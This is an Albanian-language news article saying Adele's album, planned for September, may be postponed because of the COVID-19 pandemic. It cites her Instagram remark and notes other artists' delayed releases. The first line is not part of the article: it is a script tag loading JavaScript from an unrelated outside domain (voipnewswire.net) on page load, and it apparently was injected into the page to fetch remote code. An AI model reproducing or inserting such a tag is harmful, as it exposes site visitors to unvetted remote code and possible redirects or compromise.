<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
Albumi i radhës nga këngëtarja Adele, i pari që nga viti 2015, ishte planifikuar të dalë në shtator të këtij viti.
Por, përmes një komenti që ajo bëri në rrjetin social Instagram, i ka nxitur fansat të mendojnë se do të shtyhet mes pandemisë aktuale COVID-19, shkruan Daily Mail.
Biseda u ndërpre vazhdimisht, duke e bërë Adele të komentojë: “Ky është 2020 – nuk është e shkruar që të marrim atë që duam”.
Kjo deklaratë ka nxitur spekulime te fansat e saj, të cilët besojnë se është konfirmim që albumi do të shtyhet deri vitin e ardhshëm.
Edhe artistët e tjerë, si Lady Gaga, Sam Smith dhe Alanis Morissette, i kanë anuluar të gjitha daljet e albumeve të tyre të ardhshme falë krizës globale shëndetësore.
- Drejt Italisë një tjetër grup mjekësh dhe infermierësh shqiptarë
- Edhe mjeku Roland Xhaxho fiton betejën me COVID-19